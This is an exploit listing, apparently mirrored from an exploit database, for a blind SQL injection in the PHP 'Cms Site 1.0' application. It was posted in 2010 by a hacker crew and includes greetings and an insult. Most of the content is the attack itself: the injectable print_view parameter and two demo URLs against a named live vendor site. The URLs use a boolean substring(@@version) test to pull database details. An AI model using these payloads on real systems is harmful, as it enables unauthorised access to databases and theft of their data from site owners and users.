CMS Site 1.0 remote blind SQL injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1051381 漏洞类型
发布时间 2010-01-09 更新时间 2010-01-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010010026
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
    [?] ~ Note : sEc-r1z CrEw# r0x !
====================================================================    [?] Cms Site 1.0 (print_view) Blind SQL Injection Vulnerability
====================================================================    [?] My home:              [ http://sec-r1z.com ]
    [?] Script:               [ Cms Site 1.0 ]
    [?] Language:             [ PHP ]
    [?] Vendor                [http://www.scu-mobile.org]
    [?] Founder:              [ ./Red-D3v1L ]
    [?] Gr44tz to:            [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
    [?] Fuck To :             [ Zombie_KsA << big big big L4m3r ] 
########################################################################
  
===[ Exploit SQL Blind ]===
  
[&#187;]Exploit : index.php?page_id=293&print_view=[ inject c0dE ]

[&#187;]dem0:

http://www.scu-mobile.org/index.php?page_id=293&print_view=y%20and%20substring%28@@version,1,1%29=4  << This True

http://www.scu-mobile.org/index.php?page_id=293&print_view=y%20and%20substring%28@@version,1,1%29=5  << This Faulse 

==============================================================================

#sEc-r1z.com Str1kEz y0u !